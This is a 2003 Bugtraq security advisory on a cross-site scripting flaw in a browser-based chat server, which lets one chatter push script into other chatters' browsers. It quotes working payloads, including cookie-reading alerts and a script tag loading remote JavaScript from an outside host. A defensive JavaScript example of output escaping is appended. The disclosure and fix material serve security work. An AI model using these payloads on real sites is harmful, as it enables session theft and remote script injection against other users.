Chatserver - XSS ( push )

From: morning_wood (se_cur_ity_at_hotmail.com)
Date: 08/10/03

    To: <bugtraq@securityfocus.com>
    Date: Sat, 9 Aug 2003 16:19:12 -0700
    
    

    ------------------------------------------------------------------
              - EXPL-A-2003-019 exploitlabs.com Advisory 019
    ------------------------------------------------------------------
                                   -= CHAT SERVER =-

    exploitlabs
    Aug 08, 2003

    Product:
    --------
    Chat Server ( by author of "Sleuth 1.4" )
    http://sandsprite.com/codestuff.asp

    download and vb6 sources:

    http://sandsprite.com/CodeStuff/chatserver.zip

    Vulnerability(s):
    -----------------
    XSS ( push through )

    Description of product:
    -----------------------
    Web browser based chatserver similar
     to the Magma Chatserver that powers huge
     sites like chatropolis.com. This will show
     just how they can stream text into a browser
     and display it realtime. Have an unlimited
     number of people all chatting at once using
     only their web browsers :) pretty neat

    chatserver is a server application
    and runs by default on port 80

    note: chatropolis.com is not affected

    VULNERABILITY / EXPLOIT
    =======================

    XSS is able to be "pushed" from one
    chatter to another, with the results being
    "forced" into any other chatters browser
    for execution.

    examples:

    <script>alert("You are vunerable to xss ")</script>

    <SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>

    <iframe src="http://whatismyip.com"></iframe>

    <script language="JavaScript"
    src="http://www.astalavista.com/backend/news.js"
    type="text/javascript"></script>

    note: the last one is remote code.

    the vulnerability exists in the sample provided and after compiling from
    the provided sources.

    Local:
    ------
    yes

    Remote:
    -------
    yes

    Vendor Fix:
    -----------
    No fix on 0day

    Vendor Contact:
    ---------------
    Concurrent with this advisory
    dzzie@yahoo.com

    Credits:
    --------

    Donnie Werner
    morning_wood@e2-labs.com
    http://e2-labs.com
    http://exploitlabs.com

    original advisory may be obtained at
    http://exploitlabs.com/files/advisories/EXPL-A-2003-019-chatserver.txt
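The following is an added example, not code from the advisory or from the Chat Server sources: it models the "push" a browser-based chat server performs when it streams each line into every connected browser, and shows the output escaping that keeps chatter-supplied markup from being parsed on the receiving side. The message objects and the `renderLine*` / `escapeHtml` function names are constructed for the illustration; the two payload strings are the ones quoted above.

```javascript
// Added example (not from the advisory or the Chat Server project): a minimal
// model of a chat server streaming lines into every connected browser, with the
// unsafe concatenation the advisory describes beside an escaped version.

// Constructed sample traffic; the two payload strings are the ones quoted in the advisory.
const SAMPLE_MESSAGES = [
  { nick: "alice", text: "hello everyone" },
  { nick: "mallory", text: '<script>alert("You are vunerable to xss ")</script>' },
  { nick: "<b>mallory</b>", text: '<iframe src="http://whatismyip.com"></iframe>' },
];

// Unsafe pattern (what the advisory describes): the message text is concatenated
// into the HTML pushed to every other browser, so its markup is parsed there.
function renderLineUnsafe(msg) {
  return `<b>${msg.nick}:</b> ${msg.text}<br>\n`;
}

// Escape the characters that can change HTML context; quotes are escaped too,
// so the result is also safe inside a quoted attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: every chatter-controlled field is escaped before it enters the stream.
function renderLineSafe(msg) {
  return `<b>${escapeHtml(msg.nick)}:</b> ${escapeHtml(msg.text)}<br>\n`;
}

// The whole stream as the receiving browsers would get it.
function renderStream(messages, renderLine) {
  return messages.map(renderLine).join("");
}

// Defensive check: after removing the server's own wrapper tags, no "<" may remain,
// i.e. nothing chatter-supplied survived as markup.
function hasForeignMarkup(streamHtml) {
  return streamHtml.replace(/<b>|<\/b>|<br>/g, "").includes("<");
}

console.log("unsafe stream leaks markup:",
  hasForeignMarkup(renderStream(SAMPLE_MESSAGES, renderLineUnsafe)));
console.log("escaped stream leaks markup:",
  hasForeignMarkup(renderStream(SAMPLE_MESSAGES, renderLineSafe)));
```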

